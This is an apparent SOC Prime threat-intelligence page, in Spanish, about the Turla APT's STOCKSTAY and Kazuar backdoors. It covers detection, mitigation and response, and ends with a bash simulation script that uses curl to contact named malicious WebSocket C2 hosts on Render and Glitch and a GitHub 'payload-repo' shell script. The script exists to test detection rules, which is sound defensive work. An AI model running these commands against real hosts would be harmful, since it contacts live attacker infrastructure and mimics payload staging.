SOC Prime Bias: Crítico

14 Jul 2026 15:35 UTC

Turla (Tormenta Secreta): Explicación de los Backdoors STOCKSTAY y Kazuar

Author Photo
SOC Prime Team linkedin icon Seguir
Turla (Tormenta Secreta): Explicación de los Backdoors STOCKSTAY y Kazuar
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

Turla es un grupo APT de larga data, alineado con Rusia, asociado con el FSB y conocido por operaciones de ciberespionaje contra objetivos gubernamentales y militares. El grupo depende de malware personalizado, incluyendo los backdoors STOCKSTAY y Kazuar, para mantener el acceso a largo plazo en entornos comprometidos. También abusa frecuentemente de servicios en la nube legítimos como GitHub y Cloudflare para disfrazar el tráfico de comando y control.

Investigación

El informe examina la evolución de los conjuntos de herramientas de malware de Turla, con un enfoque en las familias STOCKSTAY y Kazuar. Analiza las técnicas de secuestro de infraestructura del grupo, su uso de plataformas sin servidores para comando y control, y su capacidad para explotar vulnerabilidades como el recorrido de ruta de WinRAR. La investigación también destaca el uso de claves ambientales por parte de Turla para reducir la exposición al análisis de sandbox.

Mitigación

Las organizaciones deberían implementar un monitoreo fuerte para el uso no autorizado de plataformas web de confianza como GitHub y Cloudflare cuando los patrones de tráfico parezcan anormales. La corrección inmediata de vulnerabilidades como CVE-2025-8088 es esencial para prevenir escrituras de archivos no autorizadas. Los defensores también deberían vigilar la instalación no autorizada de certificados raíz y la ejecución sospechosa de PowerShell o VBScript que pueda indicar actividad de Turla.

Respuesta

Si se detecta actividad de Turla, los respondedores deberían aislar los hosts afectados e investigar cuentas de administrador local no autorizadas. Se debe realizar una revisión detallada de los árboles de procesos para descubrir carga lateral de DLL involucrando binarios legítimos como utilidades de NVIDIA o Brother Printer. También se debe verificar la telemetría de la red para detectar tráfico inusual de WebSocket, y revisar el almacén de confianza de la máquina en busca de cambios sospechosos en los certificados.

Flujo de Ataque

Ejecución de Simulación

Prerrequisito: El Control de Pre-vuelo de Telemetría y Línea Base debe haber pasado.

Razonamiento: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados llevarán a un diagnóstico erróneo.

  • Narrativa y Comandos del Ataque: Un adversario ha establecido exitosamente un punto de apoyo y ahora intenta establecer comunicación C2. Para evadir la detección, utilizan un enfoque de «vivir de la tierra» alcanzando una plataforma sin servidor alojada en onrender.com a través de una conexión WebSocket. Simultáneamente, intentan descargar una carga de segunda etapa de un repositorio público de GitHub para mezclarse con el tráfico de desarrolladores. La simulación utilizará curl and wscat (si está disponible) o solicitudes web estándar para generar los patrones de URL específicos definidos en la lógica de detección.

  • Script de Prueba de Regresión: [Provide the exact, self-contained, and executable code snippet for the simulation.]

    #!/bin/bash
    # Script de simulación para Validación de Detección C2 de STOCKSTAY
    
    echo "[+] Iniciando la Simulación: TTPs de C2 de STOCKSTAY"
    
    # 1. Activador: C2 WebSocket a través de Render (URL Específica)
    echo "[*] Simulando conexión de WebSocket a URL maliciosa de Render..."
    curl -k "wss://google-ai-labs-it.onrender.com/ws"
    
    # 2. Activador: C2 WebSocket a través de Glitch (URL Específica)
    echo "[*] Simulando conexión de WebSocket a URL maliciosa de Glitch..."
    curl -k "wss://wool-basalt-clock.glitch.me/ws"
    
    # 3. Activador: GitHub Staging (Coincidencia de Dominio General)
    echo "[*] Simulando preparación de carga útil a través de GitHub..."
    curl -I "https://github.com/malicious-actor/payload-repo/raw/main/shell.sh"
    
    echo "[+] Simulación Completa. Verifique SIEM para alertas."
  • Comandos de Limpieza:

    # No se crean artefactos persistentes en el host por esta simulación.
    # Asegúrese de eliminar cualquier archivo bash temporal si se crea.
    rm -f simulation_stockstay.sh